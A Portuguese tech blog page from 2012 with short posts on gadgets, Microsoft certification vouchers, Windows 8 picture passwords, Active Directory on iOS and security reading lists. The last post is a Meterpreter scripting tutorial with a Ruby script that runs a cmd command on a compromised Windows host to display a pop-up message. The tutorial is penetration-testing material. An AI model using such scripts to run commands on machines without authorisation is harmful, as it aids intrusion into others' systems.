Mundo Tecnológico

Tentáculo USB se move quando conectado ao PC!

dezembro 7, 2012Diego Piffaretti1 comentário

Existem coisas que são extremamente inúteis e ainda assim conseguem ser legais, como é o caso deste tentáculo USB. Basta conectá-lo a uma porta USB que ele começa a se contorcer, como se um polvo, Cthulhu ou seja lá o que for, estivesse saindo de dentro do PC. Uma coisa é certa, a diversão é garantida com o brinquedo USB! Veja o tentáculo em ação no vídeo a seguir:

http://embed.videolog.tv/v/index.php?id_video=881469&related=&hd=&color1=&color2=&color3=&slideshow=true&#038

O tentáculo USB está à venda na ThinkGeek e custa US$ 25.

Muito legal! :mrgreen:

Fonte:RockNTech

Cafeteiras Nestle Star Wars!

dezembro 5, 2012Diego PiffarettiDeixe um comentário

A Nestle Japan anunciou duas incríveis cafeteiras Gold Blend Barista Star Wars que vão matar os ocidentais de inveja!

As cafeteiras Gold Blend Barista Star Wars estão disponíveis em dois tipos: a “Dark Side” toda preta com o Darth Vader e o logo Star Wars e a “Ligth Side” com o C-3PO e o R2-D2. Cada cafeteira vem com uma caneca, com o símbolo do Império ou dos Rebeldes, e mais um sabre de luz para mexer o café, vermelho para o Dark Side e azul para Light Side.

As cafeteiras de Star Wars têm edição limitada e estão a venda com exclusividade no Japão por ¥9.800 (R$253). Mais informações no site da Nestle Japan em japonês.

Fonte:DigitalDrops

Vamos de Second Shot? Certificação Microsoft

dezembro 3, 2012Diego PiffarettiDeixe um comentário

A promoção de Second Shot oferecida por a Microsoft já está disponível há algum tempo mas ainda não tinha publicado aqui no blog (por questões de tempo) como ela está funcionando esse ano. Segue agora uma descrição completa de como essa campanha está ocorrendo!

Vamos começar do início! Para quem não conhece a second shot, esta é uma promoção onde caso o candidato não seja aprovado no seu exame, ele terá o direito de realizar outra prova sem nenhum custo adicional. Neste ano, temos duas possibilidades desta promoção, são elas:

Pacotes de certificação Microsoft: Para quem não conhece essa campanha, a Microsoft permite que você adquira um pacote com várias certificações com desconto (atualmente 15% do valor total) e, caso não passe em alguma delas, poderá realizar outro exame sem nenhum custo adicional.
Exame único: Se você quiser agendar um único exame, a promoção de second shot continua existindo. Por outro lado, você não terá os 15% de desconto informado no item anterior.

Caso você queira agendar o seu exame, com o seu voucher na mão, o processo de agendamento é muito simples! Acesse o site www.prometric.com/microsoft e agende o exame que você deseja realizar. Siga todo o procedimento escolhendo o número do exame, localização e data de realização. Na última janela, você terá que informar os dados de pagamento. Na parte superior desta página você terá uma sessão chamada “Promotion Code or Voucher”. Clique na opção YES e selecione Voucher Number como Discount Type. Digite o voucher que você recebeu no seu email no campo disponível e clique em Validate. Caso você não seja aprovado na sua primeira tentativa, utilize-se do mesmo voucher number enviado para o seu email para agendar outra prova sem nenhum custo adicional.

E como faço para solicitar o voucher? Deixo abaixo as duas possibilidades!

Para solicitar um único voucher (sem desconto) o link é o seguinte:http://www.prometric.com/microsoft/singleexamsecondshot

Caso você queira agendar para um pacote de certificações, que nos fornece 15% de desconto, deixo abaixo quais títulos estão incluídos na promoção. Basta clicar no título desejado e seguir o que for requerido.

O último dia de solicitação destes voucher será no dia 31 de maio de 2013! Caso você adquira a promoção com um único voucher, você poderá realizar o seu exame, incluindo a second shot, até dia 31 de maio de 2013. Caso você adquira o pacote de certificações, você poderá realizar estes exames, incluindo a second shot, até o dia 31 de dezembro de 2013.

Simples, não?!

Bom pessoal, fico a disposição de todos vocês para qualquer eventual dúvida, ok?

Fonte:Atilla Arruda

Testando Sistema Operacional do Firefox no proprio navegador

dezembro 3, 2012Diego PiffarettiDeixe um comentário

Há um bom tempo atrás, a corporação Mozilla havia anunciado um novo sistema operacional feito para smartphones e talvez até mesmo para tablets. Trata-se do Firefox OS, que por sinal, ainda esta em desenvolvimento e é um dos principais focos da corporação.

Como o SO ainda esta em desenvolvimento e não foidivulgadouma versão final para uso definitivo, a Mozilla decidiucriarum tipo de simulador que pode ser usado diretamente do Mozilla Firefox, tanto no Windows, como também no Linux e no MacOS. Por se tratar de um simulador, muitos pensam que este exibe poucos recursos ao dispor do usuário, mas quem pensa isso esta enganado! O simulador é mesmo de boa qualidade e demonstra vários recursos, até mesmo como funciona a navegação e além disso, você pode até explorar as configurações do Firefox OS. Sem mais delongas, vamos aprender a como usar o simulador do sistema operacional feito para portáteis da Mozilla!

Primeiramente, é necessário que você esteja usando onavegadorFirefox o mais atualizado possível, e caso já esteja usando, bastaclicar aquipara ir a página do simulador.

Como vocês podem ver, estou a usar o Ubuntu 12.10, então terei de clicar no link Linux. Se você estiver usando o Windows, clique no link correspondente a ele e a dica é a mesma para quem usa MacOS. Após ter feito isso, o simulador irá pedir uma permissão e você deverá autoriza-la.

Depois de Permitir, o Firefox irá começar a instalar. Dependendo da velocidade de suaconexão, a instalação do simulador pode demorar um pouco, pois são 98 MBs de arquivos para baixar.

Quando o download do simulador estiver concluído, note que o Firefox abrirá uma nova aba com o painel do Firefox OS.

No canto esquerdo do painel, clique em Stopped para ativar o simulador , para assim, você começar a usar e explorar o protótipo do sistema operacional para portáteis da Mozilla, o Firefox OS.

No simulador do Firefox OS, não é possível usar todos os aplicativos, pois nem todos estão em fase final ou não são compatíveis com o computador, por se tratar de um simulador. Apps como a câmera, bluetooth, rádio e alguns outros não irão funcionar. Um aplicativo que funciona bem, é o visualizador deimagens, pois mesmo no simulador, ele consegue explorar as imagens do seu computador localizado na sua pasta pessoal (Minhas Imagens). O navegador Firefox também ganha destaque, pois ele funciona como devido. É possível que o simulador de alguns congelamentos, mas não duram muito a ponto de irritar o usuário.

Como já dito, este simulador do Firefox OS é só para testes, então explore o quanto quiser o sistema operacional e caso ache algum bug, comente aqui que faremos uma lista para enviar a Mozilla!
Fonte:Infomanico

Criando senha usando uma imagem no Windows 8

novembro 30, 2012Diego PiffarettiDeixe um comentário

Se você tem uma senha boa e forte (como um administrador de sistemas, você certamente deve!), Você já deve ter notado que você leva muito mais tempo para entrar em um dispositivo tablet do que para fazê-lo em um PC normal. Microsoft tem objetivo de nos dar uma “rápida e fluida” maneira de registrar em nossos aparelhos com o novo login imagem senha no Windows 8.

Dois elementos estão envolvidos com o login, senha foto. O primeiro é uma imagem selecionada pelo usuário; Microsoft intencionalmente não apresentou uma seleção de imagens para isso, como a seleção de sua própria imagem aumenta a segurança e memorização da senha foto. O segundo elemento é um conjunto de “gestos” que o usuário faz ou em torno da imagem selecionada. Estes gestos podem ser uma combinação de círculos, linhas e torneiras. O círculo e gestos de linha também oferecem uma camada adicional de segurança, como a direção desses gestos deve ser correta, a fim de autenticar com êxito.

Para criar uma senha imagem para sua conta, selecione “Configurações” na barra de encantos. Você pode chegar ao bar encantos, apontando para um dos cantos direito da tela.

Windows 8 charms bar – More PC settings

No painel de configurações para a direita, selecione “Mais configurações do PC.” Isso vai levá-lo para o novo aplicativo do painel de controle do Metro. Quando o aplicativo é iniciado, selecione “Usuários” na lista do lado esquerdo da tela. Você verá várias opções relacionadas com a sua conta de usuário. Da metade para baixo estas opções à direita, você verá um botão “Criar uma senha de imagem.” Clique neste botão para iniciar o assistente de senha foto.
Windows 8 PC settings

Windows 8 PC settings

Uma vez que o assistente de senha quadro começou, a primeira coisa que você precisa fazer é selecionar uma imagem para usar. Eu recomendaria uma foto de resolução decente. Para o meu exemplo, eu usei o logotipo 4sysops, no entanto, o Windows escalado para caber na tela, assim que acabei olhando muito pixelizada. Você notará que o navegador novo arquivo Metro-base é usado quando você está selecionando a sua imagem.

Windows 8 picture password – Choose picture

Depois de selecionar a imagem, você vai precisar fazer 3 gestos em torno dele. Como mencionado anteriormente, estes podem incluir círculos, linhas e torneiras. Depois de ter feito seus gestos, você terá que fazê-los novamente, só assim o sistema sabe que você entendeu direito (da mesma forma que você sempre precisará digitar a nova senha duas vezes).

Windows 8 picture password – Set up your gestures

Se você conseguir executar os mesmos gestos com uma precisão satisfatória o segundo tempo, o Windows irá salvar a senha imagem para sua conta. Da próxima vez que você entra, você será presenteado com a sua imagem para executar seus gestos diante. Se você esquecer seus gestos (como eu prontamente fiz!), Você ainda pode cair de volta para um login baseado em senha regular e definir sua senha foto novamente.

Enquanto senhas de imagem pode fazer o login mais rápido e mais fácil para os usuários finais, isso não pode ser algo que os administradores de sistemas como o som de! Espero que ele é mais fácil de obter gestos de um usuário toque em uma imagem de assistir por cima do ombro do que seria fazer o mesmo com um login baseado em senha tradicional. Windows 8 fornece um novo objeto de diretiva de grupo (GPO) para permitir aos administradores impedir os utilizadores de usar esse recurso:

Computer configuration-> Administrative Templates-> System-> Logon-> Turn off PIN and Picture password logon

Gerenciando o AD pelo iphone/ipad

novembro 30, 2012Diego PiffarettiDeixe um comentário

Active Directory Assist é uma ferramenta de Gerenciamento do Active Directory para o iPhone e iPad. Também conhecida como ADAssist, esta ferramenta apresenta uma maneira fácil e intuitiva para gerenciar o Active Directory de qualquer lugar, diretamente de seu dispositivo iOS, através de redes Wi-Fi ou celular.

ADAssist é um nativo do iOS app, que se comunica diretamente com o Active Directory utilizando nativas chamadas LDAP, fim criptografado para terminar entre o dispositivo eo controlador de domínio usando o Active Directory do protocolo Kerberos v5. O aplicativo não requer qualquer instalação de software ou alterações de configuração na rede Enterprise.

iOS Active Directory management – Active Directory Assist

A solução é o agente menos, então você está trabalhando dentro de um minuto. Basta digitar as primeiras letras e de busca automática imediatamente cria a lista de usuários. A interface é fácil de usar e intuitivo, oferecendo opções de contexto baseados. É como ter um Active Directory na palma da mão.

Intelligent and optimized search for users, groups, computers and contacts
Manage user tasks such as Password reset, Unlock Account, and other essential Account Management options such as set “Account expiry date”, set/unset “Password to never expire” and more
Ability to Add/Remove/Move Users and enable/disable them
Ability to Move/Delete computers, groups and contacts
Manage adding and removing members from Groups
Generate quick reports on “Locked Accounts”, “Soon to expire passwords“ and “Soon to expire accounts”.

Active Directory Assist custa $7.99. A versão gratuita tem todos os recursos, mas só suporta conta as mudanças de grupos protegidos (como administradores de domínio).

Pesquisa mostra 10 práticas de corrupção do brasileiro

novembro 28, 2012novembro 28, 2012Diego PiffarettiDeixe um comentário

Quase um em cada quatro brasileiros (23%) afirma que dar dinheiro a um guarda para evitar uma multa não chega a ser um ato corrupto, de acordo com uma pesquisa feita pela UFMG (Universidade Federal de Minas Gerais) e o Instituto Vox Populi. Os números refletem o quanto atitudes ilícitas, de tão enraizadas em parte da sociedade brasileira, acabam sendo encarados como parte do cotidiano. As informações são da BBC Brasil.

“Muitas pessoas não enxergam o desvio privado como corrupção. Só levam em conta a corrupção no ambiente público”, diz o promotor de Justiça Jairo Cruz Moreira. Ele é coordenador nacional da campanha do Ministério Público. Como lida diariamente com o assunto, Moreira ajudou a BBC Brasil a elaborar uma lista de dez atitudes que os brasileiros costumam tomar e que, por vezes, nem percebem que se trata de corrupção. Veja quais são elas:

– Não dar nota fiscal
– Não declarar Imposto de Renda
– Tentar subornar o guarda para evitar multas
– Falsificar carteirinha de estudante
– Dar/aceitar troco errado
– Roubar TV a cabo
– Furar fila
– Comprar produtos falsificados
– No trabalho, bater ponto pelo colega
– Falsificar assinaturas

“Aceitar essas pequenas corrupções legitima aceitar grandes corrupções”, afirma o promotor. “Seguindo esse raciocínio, seria algo como um menino que hoje não vê problema em colar na prova ser mais propenso a, mais pra frente, subornar um guarda sem achar que isso é corrupção”, diz.
Segundo a pesquisa da UFMG, 35% dos entrevistados dizem que algumas coisas podem ser um pouco erradas, mas não corruptas, como sonegar impostos quando a taxa é cara demais.

Livros de Seguranca Resposta a Incidentes e Forense Computacional

novembro 28, 2012novembro 28, 2012Diego Piffaretti1 comentário

O Richard Beijtlich publicou hoje uma lista de leituras recomendadas em seu blog, motivada pela solicitação de um Coronel da Força Aérea Norteamericana:

Segue o link do post do Richard:

http://taosecurity.blogspot.com.br/2012/11/commanders-reading-list.html?m=1

Segue a lista:

“Nontechnical books:

America the Vulnerable by Joel Brenner

Cyber War by Richard Clarke and Robert Knake

Crypto by Steven Levy

Geekonomics by David Rice

Security Metrics by Andrew Jaquith

The Victorian Internet by Tom Standage

The Cuckoo’s Egg by Cliff Stoll

Tiger Trap by David Wise

Technical books:

Software Security by Gary McGraw

The Art of Computer Virus Research and Defense by Peter Szor

Real Digital Forensics by Keith Jones, Curtis Rose, and Richard Bejtlich

Incident Response by Kevin Mandia, Matt Pepe, and Chris Prosise

The Internet and Its Protocols by Adrian Farrell

The Tao of Network Security Monitoring by Richard Bejtlich

Hacking Exposed 7 by Joel Scambray, George Kurtz, Stuart McClure, and a ton of contributors

I also recommend any books by Timothy L Thomas.”

Conheça serviços que medem sua ‘influência’ na internet

novembro 28, 2012Diego PiffarettiDeixe um comentário

Em tempos em que a capacidade de atingir a audiência de forma precisa está cada dia mais valorizada, os sites que medem o ‘valor’ de cada internauta estão se multiplicando. Hoje sua “sugestão”, seu “curtir”, seu comentário, seu tuite, seu +1, sua pin-it, etc, podem estar valendo ouro para quem tenta entender como isso tudo se relaciona com a influência e a audiência da internet.

A conta é feita, no geral, pela quantidade de seguidores, números de curtições, retuites e comentários às suas postagens. Assim se chega a um valor que lhe é atribuído. O nível de engajamento, ou seja, a interação dos outros usuários às suas publicações, conta mais do que a quantidade de seguidores ou fãs. Então não adianta só ter muitos seguidores, é preciso que eles curtam e comentem o conteúdo que você gerar.

Serviços

Peerindex atribui um número que mede sua ‘relevância’ na rede. (Foto: Reprodução)

O Peerindex acredita que a internet é você, feita pelo conteúdo que você publica e que sem você ela seria muito chata. Eles querem saber quem são as pessoas que lhe influenciam e quais são influenciadas por você. O índice gerado seria uma maneira de aproximar pessoas com interesses semelhantes através do mundo. Por outro lado lhe é oferecida uma maneira de ‘aumentar’ a sua pontuação, através dos peerperks. Que são prêmios que você se candidata a ganhar em troca de divulgar o produto.

http://www.peerindex.com

Empire Avenue

O Empire Avenue se diz “o jeito mais rápido e eficiente” de avaliar suas conexões sociais. Parece, e não deixa de ser, mais um joguinho. É uma bolsa de valores onde a ‘ação’ é você. Aqui também sua atuação nas redes sociais é analisada e um score lhe é dado. E esse score pode ser melhorado com o cumprimento de ‘missões’. Missões essas que consistem em curtir, tuitar, etc. algum conteúdo ou pessoa.

http://www.empireavenue.com

Klout

O Klout é talvez o mais conhecido. Sua missão, segundo eles, é potencializar a influência de cada internauta. É simples e direto. Avalia suas conexões sociais, lhe dá uma pontuação e também lhe oferece uma maneira de aumentar o score através da divulgação de produtos. Permite que você ‘valorize’ quem lhe influencia ao dar ‘+K’ e ajudar a aumentar o score da pessoa. É o único que conta com uma app para smartphones.

http://klout.com

Todos esses medidores se propõem a lhe ajudar a aumentar sua influência nas redes sociais lhe sugerindo novas conexões com pessoas que possam lhe interessar ou requisitando que você divulgue produtos indicados à sua faixa de influência. A princípio poderíamos pensar que é apenas mais uma forma de nos oferecer novos produtos. Mas pensando bem, não seremos nós o produto?

Fonte:LinhaDefensiva

Script para enviar mensagem remota pelo Meterpreter

novembro 27, 2012Diego PiffarettiDeixe um comentário

Vamos começar uma introdução ao desenvolvimento de scripts Meterpreter. É realmente interessante para ser capaz de entender como esses scripts são feitas para aumentar as tarefas disponíveis e personalizá-las, se você precisar dele em um teste de penetração. Neste artigo, apresentamos o conceito de Mixins, que facilitam a interação com o agente remoto (que injeta Meterpreter memória na máquina remota).

Mixins

Mixins são uma série de chamadas que representam tarefas comuns e mais utilizadas no desenvolvimento de scripts Meterpreter. Assim é simplificada e muito a interação com o agente remoto. Há um número de Mixins, embora em artigo de hoje, utilizar uma das cmd_exec mais básico e usado. Este mixim executa uma cmd em uma ordem especifica , assim, sera executado o cmd na máquina violada e o resultado é mostrado na máquina do atacante.

Código de hoje:

#Autor: Pablo Gonzalez
#Windows Mensaje cmd remoto
opts = Rex::Parser::Arguments.new(
“-h” => [false, “Help menu.”],
“-s” => [true, “Mostrar mensaje en remoto”]
)

opts.parse(args) { |opt, idx, val|
print_line “val: #{val}”
print_line “idx: #{idx}”
print_line “opt: #{opt}”
case opt
when “-h”
print_line “Ayuda de mi script de Meterpreter”
print_line “Meterpreter RuLeZ”
print_line(opts.usage)
raise Rex::Script::Completed
when “-s”
if val != nil
cmd_exec(‘cmd /c’,”msg * #{val}”)
end
end
}

if client.platform !~ /win32|win64/
print_line “No compatible”
raise Rex::Script::Completed
else
print_status(“Hecho”)
end

Os parâmetros para este script são -h y -s, com-h exibe um menu de ajuda para relatar as possibilidades que o script faz. O parâmetro-s é usada para receber uma mensagem que será lançado por meio de um mixin em máquina remota violados. O cmd_exec mixin é usado, o que permite que as ordens para lançar um cmd na máquina remota. A sintaxe é simples cmd_exec mixin, o primeiro parâmetro indica que o aplicativo ou processo está lançado, e o segundo parâmetro dá o comando para executar o aplicativo.

when “-s”
if val != nil
cmd_exec(‘cmd /c’,”msg * #{val}”)
end
end
}

Porva de script

Você pode ver a execução do script de saída resultante usando o run <ruta script>. Você pode ver a ajuda de script na imagem a seguir. Pode ser visto como o parâmetro -s exige a inserção de uma string, que é exibida no computador remoto como um pop-up.